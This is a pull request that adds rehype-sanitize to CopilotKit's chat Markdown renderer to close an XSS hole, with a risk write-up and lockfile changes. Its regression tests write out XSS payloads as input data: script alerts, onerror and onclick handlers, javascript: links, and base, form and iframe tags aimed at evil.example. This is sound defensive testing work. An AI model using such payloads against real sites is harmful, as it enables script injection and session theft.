### PR TITLE
fix(react-ui): sanitize raw HTML in Markdown renderer to prevent XSS

### DIFF
--- a/packages/react-ui/package.json
+++ b/packages/react-ui/package.json
@@ -63,6 +63,7 @@
     "react-markdown": "^10.1.0",
     "react-syntax-highlighter": "^15.6.1",
     "rehype-raw": "^7.0.0",
+    "rehype-sanitize": "^6.0.0",
     "remark-gfm": "^4.0.1",
     "remark-math": "^6.0.0"
   },
@@ -72,6 +73,7 @@
     "eslint": "^8.56.0",
     "postcss": "^8.4.20",
     "react": "^18.2.0",
+    "react-dom": "^19.2.0",
     "tailwind-config": "workspace:*",
     "tailwindcss": "^3.3.0",
     "tsconfig": "workspace:*",

--- a/packages/react-ui/src/components/chat/Markdown.tsx
+++ b/packages/react-ui/src/components/chat/Markdown.tsx
@@ -1,9 +1,12 @@
-import { FC, memo, useMemo } from "react";
-import ReactMarkdown, { Options, Components } from "react-markdown";
+import type { FC } from "react";
+import { memo, useMemo } from "react";
+import type { Options, Components } from "react-markdown";
+import ReactMarkdown from "react-markdown";
 import { CodeBlock } from "./CodeBlock";
 import remarkGfm from "remark-gfm";
 import remarkMath from "remark-math";
 import rehypeRaw from "rehype-raw";
+import rehypeSanitize from "rehype-sanitize";
 
 const defaultComponents: Components = {
   a({ children, ...props }) {
@@ -148,7 +151,7 @@ export const Markdown = ({
     [remarkPlugins],
   );
   const mergedRehypePlugins = useMemo<Options["rehypePlugins"]>(
-    () => [rehypeRaw, ...(rehypePlugins ?? [])],
+    () => [rehypeRaw, ...(rehypePlugins ?? []), rehypeSanitize],
     [rehypePlugins],
   );
   return (

--- a/packages/react-ui/src/components/chat/Markdown.xss.test.ts
+++ b/packages/react-ui/src/components/chat/Markdown.xss.test.ts
@@ -1,0 +1,170 @@
+import React from "react";
+import { renderToStaticMarkup } from "react-dom/server";
+import { Markdown } from "./Markdown";
+
+/**
+ * Security regression test: the legacy Markdown renderer uses
+ * react-markdown + rehype-raw, which parses raw HTML embedded in
+ * assistant/model output. Without an HTML sanitizer, that raw HTML
+ * reaches the DOM verbatim — a High-severity XSS sink (CWE-79).
+ *
+ * These tests render the REAL <Markdown> component (the same default
+ * path as AssistantMessage) and assert that dangerous raw-HTML
+ * payloads are stripped from the rendered output, while legitimate
+ * Markdown/GFM features continue to render.
+ *
+ * The file is a `.ts` (not `.tsx`) test using React.createElement
+ * because the vitest config only matches the `.ts` test glob in a node
+ * environment. We render with react-dom/server so the assertions
+ * exercise the actual production rendering pipeline.
+ */
+
+const h = React.createElement;
+
+function render(
+  content: string,
+  rehypePlugins?: React.ComponentProps<typeof Markdown>["rehypePlugins"],
+): string {
+  return renderToStaticMarkup(
+    h(Markdown, rehypePlugins ? { content, rehypePlugins } : { content }),
+  );
+}
+
+describe("Markdown XSS sanitization", () => {
+  describe("dangerous raw HTML is stripped", () => {
+    it("strips <script> tags", () => {
+      const html = render('Hello <script>alert("xss")</script> world');
+      expect(html).not.toMatch(/<script/i);
+      expect(html).not.toContain('alert("xss")');
+    });
+
+    it("strips <style> tags (CSS exfiltration / clickjacking)", () => {
+      const html = render(
+        "Hello <style>body { background: url('//evil') }</style> world",
+      );
+      // The <style> ELEMENT must not survive — that is the active sink.
+      // rehype-sanitize drops the element but keeps its (now inert) text,
+      // which is harmless escaped text, not a stylesheet.
+      expect(html).not.toMatch(/<style/i);
+      // The CSS payload must not survive as a functional stylesheet. Because
+      // the <style> element is stripped, the url('//evil') declaration can
+      // only appear (if at all) as inert escaped text, never inside a live
+      // <style> block where it would fetch the resource.
+      expect(html).not.toMatch(/<style[^>]*>[^<]*url\(/i);
+    });
+
+    it("strips <base href> (base-tag hijacking)", () => {
+      const html = render('Hello <base href="https://evil.example/"> world');
+      expect(html).not.toMatch(/<base/i);
+      expect(html).not.toContain("evil.example");
+    });
+
+    it("strips <form action> and <button formaction>", () => {
+      const html = render(
+        'Hi <form action="https://evil.example/steal">' +
+          '<button formaction="https://evil.example/steal">go</button>' +
+          "</form>",
+      );
+      expect(html).not.toMatch(/<form/i);
+      expect(html).not.toMatch(/formaction/i);
+      expect(html).not.toContain("evil.example");
+    });
+
+    it("strips inline event handlers (onerror/onclick)", () => {
+      const html = render(
+        'Look <img src="x" onerror="alert(1)"> and ' +
+          '<a href="#" onclick="alert(2)">link</a>',
+      );
+      expect(html).not.toMatch(/onerror/i);
+      expect(html).not.toMatch(/onclick/i);
+      expect(html).not.toContain("alert(1)");
+      expect(html).not.toContain("alert(2)");
+    });
+
+    it("strips javascript: URLs from links", () => {
+      // eslint-disable-next-line no-script-url
+      const html = render("[click](javascript:alert(1))");
+      expect(html).not.toContain("javascript:alert(1)");
+      // The href must be neutralized — not merely the payload string absent.
+      // A partially-broken sanitizer could drop the args but keep the scheme.
+      expect(html).not.toMatch(/href="javascript:/i);
+    });
+
+    it("strips <iframe>", () => {
+      const html = render(
+        'Hi <iframe src="https://evil.example"></iframe> bye',
+      );
+      expect(html).not.toMatch(/<iframe/i);
+      expect(html).not.toContain("evil.example");
+    });
+
+    it("sanitizes HTML injected by a consumer rehype plugin (sanitize must run last)", () => {
+      // A malicious/compromised consumer-supplied rehype plugin injects a
+      // raw <script> element directly into the HAST. rehype-sanitize must be
+      // the TERMINAL rehype pass so that ANY node a consumer plugin adds is
+      // still scrubbed. If consumer plugins run after sanitize, this payload
+      // survives to output — a sanitizer bypass (CWE-79).
+      const injectScript = () => (tree: any) => {
+        tree.children.push({
+          type: "element",
+          tagName: "script",
+          properties: {},
+          children: [{ type: "text", value: 'alert("pwned")' }],
+        });
+      };
+      const html = render("safe content", [injectScript]);
+      expect(html).not.toMatch(/<script/i);
+      expect(html).not.toContain('alert("pwned")');
+    });
+  });
+
+  describe("legitimate markdown features are preserved", () => {
+    it("renders headings, paragraphs, and links", () => {
+      const html = render(
+        "# Title\n\nSome **bold** [link](https://ok.example)",
+      );
+      expect(html).toMatch(/<h1[^>]*>/i);
+      expect(html).toContain("Title");
+      expect(html).toContain("https://ok.example");
+      expect(html).toMatch(/<strong>bold<\/strong>/i);
+    });
+
+    it("preserves language-* className on code blocks (syntax highlighting)", () => {
+      const html = render("```js\nconst x = 1;\n```");
+      // The CodeBlock renderer is driven by the language-js className that
+      // react-markdown derives from the fenced-code info string. Sanitize
+      // must not strip the class attribute that selects the language, and
+      // the highlighted code content must survive (the syntax highlighter
+      // tokenizes it across spans, so assert on the tokens, not a verbatim
+      // contiguous string).
+      //
+      // Assert language-js survives as an actual sanitized class ATTRIBUTE
+      // (class="...language-js...") rather than as a bare substring that a
+      // highlighter span or inline style could incidentally emit. This proves
+      // rehype-sanitize kept the class attribute on the code element.
+      expect(html).toMatch(/class="[^"]*\blanguage-js\b[^"]*"/);
+      expect(html).toMatch(/const/);
+      expect(html).toMatch(/x/);
+      expect(html).toMatch(/1/);
+    });
+
+    it("renders GFM tables", () => {
+      const md = ["| a | b |", "| - | - |", "| 1 | 2 |"].join("\n");
+      const html = render(md);
+      expect(html).toMatch(/<table/i);
+      expect(html).toMatch(/<td[^>]*>1<\/td>/i);
+    });
+
+    it("renders GFM strikethrough", () => {
+      const html = render("~~gone~~");
+      expect(html).toMatch(/<del>gone<\/del>/i);
+    });
+
+    it("preserves the streaming cursor marker", () => {
+      // The Markdown component renders a pulsing span for the ▍ cursor
+      // emitted during streaming. Sanitization must not remove it.
+      const html = render("partial answer `▍`");
+      expect(html).toContain("▍");
+    });
+  });
+});

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -656,7 +656,7 @@ importers:
         version: 0.1.13
       eslint-config-next:
         specifier: ^15.0.2
-        version: 15.4.4(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
+        version: 15.4.4(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
       flowtoken:
         specifier: ^1.0.40
         version: 1.0.40(@types/react@19.1.8)(react@19.2.3)
@@ -2940,6 +2940,9 @@ importers:
       rehype-raw:
         specifier: ^7.0.0
         version: 7.0.0
+      rehype-sanitize:
+        specifier: ^6.0.0
+        version: 6.0.0
       remark-gfm:
         specifier: ^4.0.1
         version: 4.0.1
@@ -2962,6 +2965,9 @@ importers:
       react:
         specifier: 19.2.3
         version: 19.2.3
+      react-dom:
+        specifier: 19.2.3
+        version: 19.2.3(react@19.2.3)
       tailwind-config:
         specifier: workspace:*
         version: link:../tailwind-config
@@ -30522,11 +30528,6 @@ snapshots:
       eslint: 8.57.1
       eslint-visitor-keys: 3.4.3
 
-  '@eslint-community/eslint-utils@4.9.1(eslint@9.39.2(jiti@1.21.7))':
-    dependencies:
-      eslint: 9.39.2(jiti@1.21.7)
-      eslint-visitor-keys: 3.4.3
-
   '@eslint-community/eslint-utils@4.9.1(eslint@9.39.2(jiti@2.6.1))':
     dependencies:
       eslint: 9.39.2(jiti@2.6.1)
@@ -38607,16 +38608,16 @@ snapshots:
       '@types/node': 22.19.11
     optional: true
 
-  '@typescript-eslint/eslint-plugin@7.2.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2))(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)':
+  '@typescript-eslint/eslint-plugin@7.2.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2))(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)':
     dependencies:
       '@eslint-community/regexpp': 4.12.2
-      '@typescript-eslint/parser': 7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
+      '@typescript-eslint/parser': 7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
       '@typescript-eslint/scope-manager': 7.2.0
-      '@typescript-eslint/type-utils': 7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
-      '@typescript-eslint/utils': 7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
+      '@typescript-eslint/type-utils': 7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
+      '@typescript-eslint/utils': 7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
       '@typescript-eslint/visitor-keys': 7.2.0
       debug: 4.4.3(supports-color@5.5.0)
-      eslint: 9.39.2(jiti@1.21.7)
+      eslint: 9.39.2(jiti@2.7.0)
       graphemer: 1.4.0
       ignore: 5.3.2
       natural-compare: 1.4.0
@@ -38675,14 +38676,14 @@ snapshots:
     transitivePeerDependencies:
       - supports-color
 
-  '@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)':
+  '@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)':
     dependencies:
       '@typescript-eslint/scope-manager': 7.2.0
       '@typescript-eslint/types': 7.2.0
       '@typescript-eslint/typescript-estree': 7.2.0(typescript@5.9.2)
       '@typescript-eslint/visitor-keys': 7.2.0
       debug: 4.4.3(supports-color@5.5.0)
-      eslint: 9.39.2(jiti@1.21.7)
+      eslint: 9.39.2(jiti@2.7.0)
     optionalDependencies:
       typescript: 5.9.2
     transitivePeerDependencies:
@@ -38760,12 +38761,12 @@ snapshots:
     dependencies:
       typescript: 5.9.3
 
-  '@typescript-eslint/type-utils@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)':
+  '@typescript-eslint/type-utils@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)':
     dependencies:
       '@typescript-eslint/typescript-estree': 7.2.0(typescript@5.9.2)
-      '@typescript-eslint/utils': 7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
+      '@typescript-eslint/utils': 7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
       debug: 4.4.3(supports-color@5.5.0)
-      eslint: 9.39.2(jiti@1.21.7)
+      eslint: 9.39.2(jiti@2.7.0)
       ts-api-utils: 1.4.3(typescript@5.9.2)
     optionalDependencies:
       typescript: 5.9.2
@@ -38857,15 +38858,15 @@ snapshots:
     transitivePeerDependencies:
       - supports-color
 
-  '@typescript-eslint/utils@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)':
+  '@typescript-eslint/utils@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)':
     dependencies:
-      '@eslint-community/eslint-utils': 4.9.1(eslint@9.39.2(jiti@1.21.7))
+      '@eslint-community/eslint-utils': 4.9.1(eslint@9.39.2(jiti@2.7.0))
       '@types/json-schema': 7.0.15
       '@types/semver': 7.7.1
       '@typescript-eslint/scope-manager': 7.2.0
       '@typescript-eslint/types': 7.2.0
       '@typescript-eslint/typescript-estree': 7.2.0(typescript@5.9.2)
-      eslint: 9.39.2(jiti@1.21.7)
+      eslint: 9.39.2(jiti@2.7.0)
       semver: 7.8.1
     transitivePeerDependencies:
       - supports-color
@@ -42762,19 +42763,19 @@ snapshots:
     optionalDependencies:
       source-map: 0.6.1
 
-  eslint-config-next@15.4.4(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2):
+  eslint-config-next@15.4.4(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2):
     dependencies:
       '@next/eslint-plugin-next': 15.4.4
       '@rushstack/eslint-patch': 1.15.0
-      '@typescript-eslint/eslint-plugin': 7.2.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2))(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
-      '@typescript-eslint/parser': 7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
-      eslint: 9.39.2(jiti@1.21.7)
+      '@typescript-eslint/eslint-plugin': 7.2.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2))(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
+      '@typescript-eslint/parser': 7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
+      eslint: 9.39.2(jiti@2.7.0)
       eslint-import-resolver-node: 0.3.9
-      eslint-import-resolver-typescript: 3.10.1(eslint-plugin-import@2.32.0)(eslint@9.39.2(jiti@1.21.7))
-      eslint-plugin-import: 2.32.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2))(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@1.21.7))
-      eslint-plugin-jsx-a11y: 6.10.2(eslint@9.39.2(jiti@1.21.7))
-      eslint-plugin-react: 7.37.5(eslint@9.39.2(jiti@1.21.7))
-      eslint-plugin-react-hooks: 5.2.0(eslint@9.39.2(jiti@1.21.7))
+      eslint-import-resolver-typescript: 3.10.1(eslint-plugin-import@2.32.0)(eslint@9.39.2(jiti@2.7.0))
+      eslint-plugin-import: 2.32.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2))(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@2.7.0))
+      eslint-plugin-jsx-a11y: 6.10.2(eslint@9.39.2(jiti@2.7.0))
+      eslint-plugin-react: 7.37.5(eslint@9.39.2(jiti@2.7.0))
+      eslint-plugin-react-hooks: 5.2.0(eslint@9.39.2(jiti@2.7.0))
     optionalDependencies:
       typescript: 5.9.2
     transitivePeerDependencies:
@@ -42825,29 +42826,29 @@ snapshots:
     transitivePeerDependencies:
       - supports-color
 
-  eslint-import-resolver-typescript@3.10.1(eslint-plugin-import@2.32.0)(eslint@9.39.2(jiti@1.21.7)):
+  eslint-import-resolver-typescript@3.10.1(eslint-plugin-import@2.32.0)(eslint@9.39.2(jiti@2.7.0)):
     dependencies:
       '@nolyfill/is-core-module': 1.0.39
       debug: 4.4.3(supports-color@5.5.0)
-      eslint: 9.39.2(jiti@1.21.7)
+      eslint: 9.39.2(jiti@2.7.0)
       get-tsconfig: 4.13.6
       is-bun-module: 2.0.0
       stable-hash: 0.0.5
       tinyglobby: 0.2.16
       unrs-resolver: 1.11.1
     optionalDependencies:
-      eslint-plugin-import: 2.32.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2))(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@1.21.7))
+      eslint-plugin-import: 2.32.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2))(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@2.7.0))
     transitivePeerDependencies:
       - supports-color
 
-  eslint-module-utils@2.12.1(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2))(eslint-import-resolver-node@0.3.9)(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@1.21.7)):
+  eslint-module-utils@2.12.1(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2))(eslint-import-resolver-node@0.3.9)(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@2.7.0)):
     dependencies:
       debug: 3.2.7
     optionalDependencies:
-      '@typescript-eslint/parser': 7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
-      eslint: 9.39.2(jiti@1.21.7)
+      '@typescript-eslint/parser': 7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
+      eslint: 9.39.2(jiti@2.7.0)
       eslint-import-resolver-node: 0.3.9
-      eslint-import-resolver-typescript: 3.10.1(eslint-plugin-import@2.32.0)(eslint@9.39.2(jiti@1.21.7))
+      eslint-import-resolver-typescript: 3.10.1(eslint-plugin-import@2.32.0)(eslint@9.39.2(jiti@2.7.0))
     transitivePeerDependencies:
       - supports-color
 
@@ -42861,7 +42862,7 @@ snapshots:
     transitivePeerDependencies:
       - supports-color
 
-  eslint-plugin-import@2.32.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2))(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@1.21.7)):
+  eslint-plugin-import@2.32.0(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2))(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@2.7.0)):
     dependencies:
       '@rtsao/scc': 1.1.0
       array-includes: 3.1.9
@@ -42870,9 +42871,9 @@ snapshots:
       array.prototype.flatmap: 1.3.3
       debug: 3.2.7
       doctrine: 2.1.0
-      eslint: 9.39.2(jiti@1.21.7)
+      eslint: 9.39.2(jiti@2.7.0)
       eslint-import-resolver-node: 0.3.9
-      eslint-module-utils: 2.12.1(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2))(eslint-import-resolver-node@0.3.9)(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@1.21.7))
+      eslint-module-utils: 2.12.1(@typescript-eslint/parser@7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2))(eslint-import-resolver-node@0.3.9)(eslint-import-resolver-typescript@3.10.1)(eslint@9.39.2(jiti@2.7.0))
       hasown: 2.0.2
       is-core-module: 2.16.1
       is-glob: 4.0.3
@@ -42884,7 +42885,7 @@ snapshots:
       string.prototype.trimend: 1.0.9
       tsconfig-paths: 3.15.0
     optionalDependencies:
-      '@typescript-eslint/parser': 7.2.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.2)
+      '@typescript-eslint/parser': 7.2.0(eslint@9.39.2(jiti@2.7.0))(typescript@5.9.2)
     transitivePeerDependencies:
       - eslint-import-resolver-typescript
       - eslint-import-resolver-webpack
@@ -42917,25 +42918,6 @@ snapshots:
       - eslint-import-resolver-webpack
       - supports-color
 
-  eslint-plugin-jsx-a11y@6.10.2(eslint@9.39.2(jiti@1.21.7)):
-    dependencies:
-      aria-query: 5.3.2
-      array-includes: 3.1.9
-      array.prototype.flatmap: 1.3.3
-      ast-types-flow: 0.0.8
-      axe-core: 4.11.1
-      axobject-query: 4.1.0
-      damerau-levenshtein: 1.0.8
-      emoji-regex: 9.2.2
-      eslint: 9.39.2(jiti@1.21.7)
-      hasown: 2.0.2
-      jsx-ast-utils: 3.3.5
-      language-tags: 1.0.9
-      minimatch: 10.2.4
-      object.fromentries: 2.0.8
-      safe-regex-test: 1.1.0
-      string.prototype.includes: 2.0.1
-
   eslint-plugin-jsx-a11y@6.10.2(eslint@9.39.2(jiti@2.7.0)):
     dependencies:
       aria-query: 5.3.2
@@ -42955,9 +42937,9 @@ snapshots:
       safe-regex-test: 1.1.0
       string.prototype.includes: 2.0.1
 
-  eslint-plugin-react-hooks@5.2.0(eslint@9.39.2(jiti@1.21.7)):
+  eslint-plugin-react-hooks@5.2.0(eslint@9.39.2(jiti@2.7.0)):
     dependencies:
-      eslint: 9.39.2(jiti@1.21.7)
+      eslint: 9.39.2(jiti@2.7.0)
 
   eslint-plugin-react-hooks@7.1.1(eslint@9.39.2(jiti@2.7.0)):
     dependencies:
@@ -42969,28 +42951,6 @@ snapshots:
       zod-validation-error: 4.0.2(zod@3.25.76)
     transitivePeerDependencies:
       - supports-color
-
-  eslint-plugin-react@7.37.5(eslint@9.39.2(jiti@1.21.7)):
-    dependencies:
-      array-includes: 3.1.9
-      array.prototype.findlast: 1.2.5
-      array.prototype.flatmap: 1.3.3
-      array.prototype.tosorted: 1.1.4
-      doctrine: 2.1.0
-      es-iterator-helpers: 1.2.2
-      eslint: 9.39.2(jiti@1.21.7)
-      estraverse: 5.3.0
-      hasown: 2.0.2
-      jsx-ast-utils: 3.3.5
-      minimatch: 10.2.4
-      object.entries: 1.1.9
-      object.fromentries: 2.0.8
-      object.values: 1.2.1
-      prop-types: 15.8.1
-      resolve: 2.0.0-next.5
-      semver: 6.3.1
-      string.prototype.matchall: 4.0.12
-      string.prototype.repeat: 1.0.0
 
   eslint-plugin-react@7.37.5(eslint@9.39.2(jiti@2.7.0)):
     dependencies:
@@ -43101,47 +43061,6 @@ snapshots:
       optionator: 0.9.4
       strip-ansi: 6.0.1
       text-table: 0.2.0
-    transitivePeerDependencies:
-      - supports-color
-
-  eslint@9.39.2(jiti@1.21.7):
-    dependencies:
-      '@eslint-community/eslint-utils': 4.9.1(eslint@9.39.2(jiti@1.21.7))
-      '@eslint-community/regexpp': 4.12.2
-      '@eslint/config-array': 0.21.2
-      '@eslint/config-helpers': 0.4.2
-      '@eslint/core': 0.17.0
-      '@eslint/eslintrc': 3.3.5
-      '@eslint/js': 9.39.2
-      '@eslint/plugin-kit': 0.4.1
-      '@humanfs/node': 0.16.7
-      '@humanwhocodes/module-importer': 1.0.1
-      '@humanwhocodes/retry': 0.4.3
-      '@types/estree': 1.0.8
-      ajv: 6.14.0
-      chalk: 4.1.2
-      cross-spawn: 7.0.6
-      debug: 4.4.3(supports-color@5.5.0)
-      escape-string-regexp: 4.0.0
-      eslint-scope: 8.4.0
-      eslint-visitor-keys: 4.2.1
-      espree: 10.4.0
-      esquery: 1.7.0
-      esutils: 2.0.3
-      fast-deep-equal: 3.1.3
-      file-entry-cache: 8.0.0
-      find-up: 5.0.0
-      glob-parent: 6.0.2
-      ignore: 5.3.2
-      imurmurhash: 0.1.4
-      is-glob: 4.0.3
-      json-stable-stringify-without-jsonify: 1.0.1
-      lodash.merge: 4.6.2
-      minimatch: 10.2.4
-      natural-compare: 1.4.0
-      optionator: 0.9.4
-    optionalDependencies:
-      jiti: 1.21.7
     transitivePeerDependencies:
       - supports-color
 


### PR DESCRIPTION
## Summary

While auditing `@copilotkit/react-ui`, we found that the legacy chat Markdown renderer (`packages/react-ui/src/components/chat/Markdown.tsx`) runs `react-markdown` with `rehype-raw` and **no HTML sanitizer**. `rehype-raw` re-enables parsing of raw HTML embedded in Markdown, and this renderer is the default path for every assistant message (`AssistantMessage.tsx`). Because assistant/agent output is attacker-influenceable (prompt injection via RAG/retrieved docs, tool/web-fetch results, or a compromised agent), raw HTML could reach the DOM in the host app's origin — a cross-site scripting sink (CWE-79).

Note: the v2 `react-core` path already renders via sanitizing Streamdown; only this legacy `react-ui` renderer was exposed.

## Fix

Add `rehype-sanitize` to the rehype plugin chain, positioned as the **terminal pass**:

```
[rehypeRaw, ...(rehypePlugins ?? []), rehypeSanitize]
```

Sanitize runs **last**, after any consumer-supplied `rehypePlugins`, so it cannot be bypassed by a downstream plugin re-introducing raw HTML. The default render path (no consumer plugins) is unchanged in behavior. Adds `rehype-sanitize` as a dependency and `react-dom` (caret range) as a devDependency for the SSR-based regression test.

## Red → green

A regression test installs a malicious consumer `rehypePlugins` entry that injects a raw `<script>` node into the HAST:
- **Before** (sanitize not terminal): payload survived to output — `…safe content</div><script>alert("pwned")</script>` — bypass reproduced.
- **After** (sanitize terminal): payload stripped; test passes.

The suite also covers `<script>/<style>/<base>/<form>/<iframe>`, event handlers, and `javascript:` URLs, and asserts legitimate Markdown/GFM features still render.

## Risk

**Medium — CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N (4.8).** `react-ui` is a `"use client"` boundary, so the "arbitrary `<script>` under SSR/RSC" tier is non-default (host-misconfiguration-dependent); on the client path React already neutralizes `onerror`/`javascript:`/`<script>`. The realistic residual set this closes is `<base href>` (relative-URL/redirect hijack), `<style>`/CSS injection, DOM-clobbering, and `<form action>`. All `react-ui` 1.x consumers on the default chat are exposed today.

## Functionality retention

Full react-ui suite green (**53/53**). Verified preserved: `language-*` code classNames (syntax highlighting), GFM tables/strikethrough, the streaming cursor, and links. The default GitHub sanitize schema sufficed — no custom schema needed.

## Follow-ups (out of scope here)

- `remarkMath` is enabled with no `rehype-katex`, so `$$…$$` renders as a code-block widget rather than math — add KaTeX (+ schema) or drop `remarkMath`.
- `code` renderer robustness: it ignores react-markdown's `inline` prop and `String(children)` on multi-node arrays yields `"[object Object]"`.
- Custom components spread `{...props}` (leaking `node`), and `{...components}` lets callers override the hardened `<a>`.
- Add CSP guidance to docs (`base-uri 'self'`, `form-action 'self'`, `script-src`) as defense-in-depth.

## Test plan

- [x] `pnpm -F @copilotkit/react-ui test` — 53/53
- [x] `nx run @copilotkit/react-ui:build`
- [x] red→green on the consumer-plugin injection test